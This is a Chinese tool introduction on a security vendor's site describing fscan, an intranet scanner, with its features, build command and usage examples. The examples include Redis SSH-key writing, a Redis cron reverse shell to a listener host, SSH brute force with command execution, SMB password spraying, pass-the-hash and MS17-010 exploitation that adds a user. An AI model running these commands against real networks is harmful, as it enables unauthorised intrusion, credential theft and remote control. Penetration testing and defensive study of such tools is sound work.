长亭百川云 - 文章详情

一款功能强大的内网综合扫描工具

大中小黄

61

2024-06-19

系统介绍

********************

fscan是一款功能强大的内网综合扫描工具,它基于Go语言编写,提供了全面的内网网络扫描和漏洞检测功能。

主要功能:

  • 信息搜集:支持主机存活探测(ICMP)、端口扫描等。

  • 爆破功能:能够爆破各类服务(如SSH、SMB、RDP等)和数据库密码(如MySQL、MSSQL、Redis等)。

  • 系统信息、漏洞扫描:包括netbios探测、域控识别、获取目标网卡信息、高危漏洞扫描(如ms17010等)。

  • Web探测功能:支持webtitle探测、web指纹识别(常见CMS、OA框架等)、web漏洞扫描(如weblogic、st2等,支持xray的poc)。

  • 漏洞利用:如redis写公钥、ssh命令执行、ms17017利用等。

  • 其他功能:包括文件保存、redis计划任务反弹shell等。

工作原理:

  • fscan使用TCP连接来扫描目标主机上的端口,通过发送TCP连接请求并等待目标主机的响应来判断端口是否开放。

  • 它还可以使用ICMP协议来检测目标主机是否存活。

自定义配置:

  • 用户可以通过自定义配置文件来调整扫描策略,包括设置线程数、目标列表、端口范围等,以适应不同场景的需求。

如需了解更多信息,可以访问其官方网站或查阅相关的技术文档。

官方GitHub

https://github.com/shadow1ng/fscan

安装包

https://github.com/shadow1ng/fscan/releases

安装教程

********************

| 安装

安装fscan需要先下载并配置Go环境;然后从GitHub下载源码,对源码文件main.go进行编译。

go build -ldflags="-s -w " -trimpath main.go

安装完成后,可以通过命令行界面进行使用,支持多种命令参数来指定扫描范围、扫描类型、输出格式等。

| 使用指令

fscan.exe -h 192.168.1.1/24 (默认使用全部模块)
fscan.exe -h 192.168.1.1/16 (B段扫描)
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径)
fscan.exe -h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
fscan.exe -hf ip.txt (以文件导入)
fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)
fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)
fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)
fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支持简单tcp功能的代理,部分功能的库不支持设置代理)
fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具)
fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)
fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexec无回显命令执行)

关注公众号,为你推荐更多原创干货!

更多内容也可看笔者出版图书****

—**********************————****************——————******************************

相关推荐
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2